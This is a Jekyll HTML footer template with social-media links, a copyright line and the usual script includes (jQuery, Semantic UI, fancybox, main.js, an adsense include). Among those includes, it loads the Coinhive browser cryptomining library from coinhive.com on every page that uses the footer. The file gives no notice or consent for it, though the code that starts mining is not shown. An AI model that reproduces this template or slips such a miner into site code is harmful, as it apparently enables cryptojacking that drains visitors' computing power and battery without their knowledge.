<footer class="ui inverted vertical footer segment">
  <div class="ui center aligned container">
      <div class="ui horizontal inverted small divided link list">
          {% if site.github_username %}
          <div class="item">
            <a href="https://github.com/{{ site.github_username }}">
              <i class="big inverted icon github"></i>
              <span class="username">GitHub</span>
            </a>
          </div>
          {% endif %}
          {% if site.twitter_username %}
          <div class="item">
            <a href="https://twitter.com/{{ site.twitter_username }}">
              <i class="big inverted blue icon twitter"></i>
              <span class="username">Twitter</span>
            </a>
          </div>
          {% endif %}
          {% if site.wordpress_site %}
          <div class="item">
            <a href="{{ site.wordpress_site }}">
              <i class="big grey icon wordpress"></i>
              <span class="username">Blog</span>
            </a>
          </div>
          {% endif %}
          {% if site.codepen_username %}
          <div class="item">
            <a href="https://codepen.io/{{ site.codepen_username }}">
              <i class="big purple icon codepen"></i>
              <span class="username">Codepen</span>
            </a>
          </div>
          {% endif %}
    </div>
    <div class="ui inverted section divider"></div>
    <p>&copy;<script type="text/javascript">document.write(new Date().getFullYear());</script> {{ site.description }}</p>
  </div>
</footer>

<script src="{{ "/js/jquery-3.2.1.min.js" | prepend: site.baseurl }}"></script>
<script src="{{ "/js/semantic.min.js" | prepend: site.baseurl }}"></script>
<script src="{{ "/js/jquery.fancybox.min.js" | prepend: site.baseurl }}"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>

<script src="{{ "/js/main.js" | prepend: site.baseurl }}"></script>

{% include adsense.html %}
